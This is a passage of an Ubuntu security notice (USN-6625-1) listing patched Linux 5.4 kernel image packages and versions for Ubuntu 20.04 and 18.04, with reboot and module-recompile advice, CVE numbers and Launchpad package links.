linux-image-5.4.0-1037-xilinx-zynqmp  5.4.0-1037.41   linux-image-5.4.0-1065-ibm      5.4.0-1065.70   linux-image-5.4.0-1078-bluefield  5.4.0-1078.84   linux-image-5.4.0-1085-gkeop    5.4.0-1085.89   linux-image-5.4.0-1106-kvm      5.4.0-1106.113   linux-image-5.4.0-1117-oracle   5.4.0-1117.126   linux-image-5.4.0-1118-aws      5.4.0-1118.128   linux-image-5.4.0-1123-azure    5.4.0-1123.130   linux-image-5.4.0-171-generic   5.4.0-171.189   linux-image-5.4.0-171-generic-lpae  5.4.0-171.189   linux-image-5.4.0-171-lowlatency  5.4.0-171.189   linux-image-aws-lts-20.04       5.4.0.1118.115   linux-image-azure-lts-20.04     5.4.0.1123.116   linux-image-bluefield           5.4.0.1078.73   linux-image-generic             5.4.0.171.169   linux-image-generic-lpae        5.4.0.171.169   linux-image-gkeop               5.4.0.1085.83   linux-image-gkeop-5.4           5.4.0.1085.83   linux-image-ibm-lts-20.04       5.4.0.1065.94   linux-image-kvm                 5.4.0.1106.102   linux-image-lowlatency          5.4.0.171.169   linux-image-oem                 5.4.0.171.169   linux-image-oem-osp1            5.4.0.171.169   linux-image-oracle-lts-20.04    5.4.0.1117.110   linux-image-virtual             5.4.0.171.169   linux-image-xilinx-zynqmp       5.4.0.1037.37Ubuntu 18.04 LTS (Available with Ubuntu Pro):   linux-image-5.4.0-1065-ibm      5.4.0-1065.70~18.04.1   linux-image-5.4.0-1117-oracle   5.4.0-1117.126~18.04.1   linux-image-5.4.0-1118-aws      5.4.0-1118.128~18.04.1   linux-image-5.4.0-1123-azure    5.4.0-1123.130~18.04.1   linux-image-5.4.0-171-generic   5.4.0-171.189~18.04.1   linux-image-5.4.0-171-lowlatency  5.4.0-171.189~18.04.1   linux-image-aws                 5.4.0.1118.96   linux-image-azure               5.4.0.1123.96   linux-image-generic-hwe-18.04   5.4.0.171.189~18.04.139   linux-image-ibm                 5.4.0.1065.75   linux-image-lowlatency-hwe-18.04  5.4.0.171.189~18.04.139   linux-image-oem                 5.4.0.171.189~18.04.139   linux-image-oem-osp1            5.4.0.171.189~18.04.139   linux-image-oracle              5.4.0.1117.126~18.04.89   linux-image-snapdragon-hwe-18.04  5.4.0.171.189~18.04.139   linux-image-virtual-hwe-18.04   5.4.0.171.189~18.04.139After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6625-1   CVE-2023-34324, CVE-2023-35827, CVE-2023-45863, CVE-2023-46343Package Information:   https://launchpad.net/ubuntu/+source/linux/5.4.0-171.189   https://launchpad.net/ubuntu/+source/linux-aws/5.4.0-1118.128   https://launchpad.net/ubuntu/+source/linux-azure/5.4.0-1123.130   https://launchpad.net/ubuntu/+source/linux-bluefield/5.4.0-1078.84   https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1085.89   https://launchpad.net/ubuntu/+source/linux-ibm/5.4.0-1065.70   https://launchpad.net/ubuntu/+source/linux-iot/5.4.0-1030.31   https://launchpad.net/ubuntu/+source/linux-kvm/5.4.0-1106.113   https://launchpad.net/ubuntu/+source/linux-oracle/5.4.0-1117.126   https://launchpad.net/ubuntu/+source/linux-xilinx-zynqmp/5.4.0-1037.41

Tag

#ibm